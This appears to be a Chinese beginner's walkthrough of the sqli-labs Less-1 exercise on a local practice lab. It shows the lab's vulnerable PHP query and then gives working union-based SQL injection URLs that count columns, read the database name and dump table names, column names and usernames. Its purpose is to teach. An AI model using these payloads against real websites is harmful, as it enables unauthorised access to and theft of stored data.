靶场搭建好了,访问题目路径
http://127.0.0.1/sqli-labs-master/Less-1/我最开始在做sql-labs靶场的时候很迷茫,不知道最后到底要得到些什么,而现在我很清楚,sql注入可以获取数据库中的信息,而获取信息就是我们的目标
我作为一个初学者,我跟喜欢跟着源码分析思路,所以这里我贴出源码,分析一下
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
echo "<br>";
echo '执行的sql语句为:'.$sql;
echo '<br/>';
echo '<br/>';
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}下面的语句是正常执行的sql语句
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";当我们更改url为下面的时候
http://127.0.0.1/sqli-labs-master/Less-1/?id=1此刻我们也就是正常的在users中查询id=1的用户,而此刻前端也就会显示 账号和密码
由于我们审计代码发现只要是sql语句都可以执行,但是我们直接在id处书写语句是不符合sql语句的规范的,这样我们就必须想一个办法让前面的查询id可以正常执行,同时再执行其他的语句,那么这里我们就需要用到联合查询了 。
联合查询
联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。
首先我们先闭合前面对id查询的语句
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ ——+我们先是使用'将前面的id查询闭合起来,接着使用--+注释后端的 LIMIT 0,1
SELECT * FROM users WHERE id='1' --+' LIMIT 0,1
在联合查询注入之前要做一件很重要的事,那就是找到回显点,而回显点的个数就需要order by来查询
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 4--+当by后的数字为3时不报错,但是改为4的时候却产生报错
这就证明我们有三处回显位置,这时候我们就可以大胆的使用联合查询了
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,database() --+这里我把id的值赋为0是为了联合查询的特性,前端生肖,那么就执行后端的sql语句
查询security内的所有表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+group_concat
将组中的字符串连接所有非NULL的字符串,如果没有非Null的字符串,那么它就会返回Null
information_schema.tables
information_schema.tables存储了数据表的元数据信息
table_schema
table_schema 是数据库的名称
查表里有什么以users表为例
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
查看字段里的内容(以username里面的内容为例)
http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,database(), group_concat(username) from users --+
![[工具笔记]1.UnityEngine.Plane](https://img-blog.csdnimg.cn/b758ee6e89114386babc0962ed77e73e.png)
